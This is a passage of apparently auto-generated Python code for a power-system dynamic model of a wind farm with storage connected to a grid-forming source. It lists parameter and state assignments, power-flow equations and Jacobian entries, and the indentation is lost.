U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_run[0,0]
theta_W1lv = struct[0].y_run[1,0]
V_W2lv = struct[0].y_run[2,0]
theta_W2lv = struct[0].y_run[3,0]
V_W3lv = struct[0].y_run[4,0]
theta_W3lv = struct[0].y_run[5,0]
V_STlv = struct[0].y_run[6,0]
theta_STlv = struct[0].y_run[7,0]
V_W1mv = struct[0].y_run[8,0]
theta_W1mv = struct[0].y_run[9,0]
V_W2mv = struct[0].y_run[10,0]
theta_W2mv = struct[0].y_run[11,0]
V_W3mv = struct[0].y_run[12,0]
theta_W3mv = struct[0].y_run[13,0]
V_POImv = struct[0].y_run[14,0]
theta_POImv = struct[0].y_run[15,0]
V_STmv = struct[0].y_run[16,0]
theta_STmv = struct[0].y_run[17,0]
V_POI = struct[0].y_run[18,0]
theta_POI = struct[0].y_run[19,0]
V_GRID = struct[0].y_run[20,0]
theta_GRID = struct[0].y_run[21,0]
omega_GRID = struct[0].y_run[22,0]
i_d_GRID = struct[0].y_run[23,0]
i_q_GRID = struct[0].y_run[24,0]
p_g_GRID = struct[0].y_run[25,0]
q_g_GRID = struct[0].y_run[26,0]
p_m_GRID = struct[0].y_run[27,0]
omega_coi = struct[0].y_run[28,0]
p_agc = struct[0].y_run[29,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[28,0] = omega_GRID - omega_coi
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx[0,0] = -K_delta_GRID
struct[0].Fx[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy[0,22] = Omega_b_GRID
struct[0].Fy[0,28] = -Omega_b_GRID
struct[0].Fy[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,27] = 1
struct[0].Fy[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy[3,28] = -1
struct[0].Gy[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
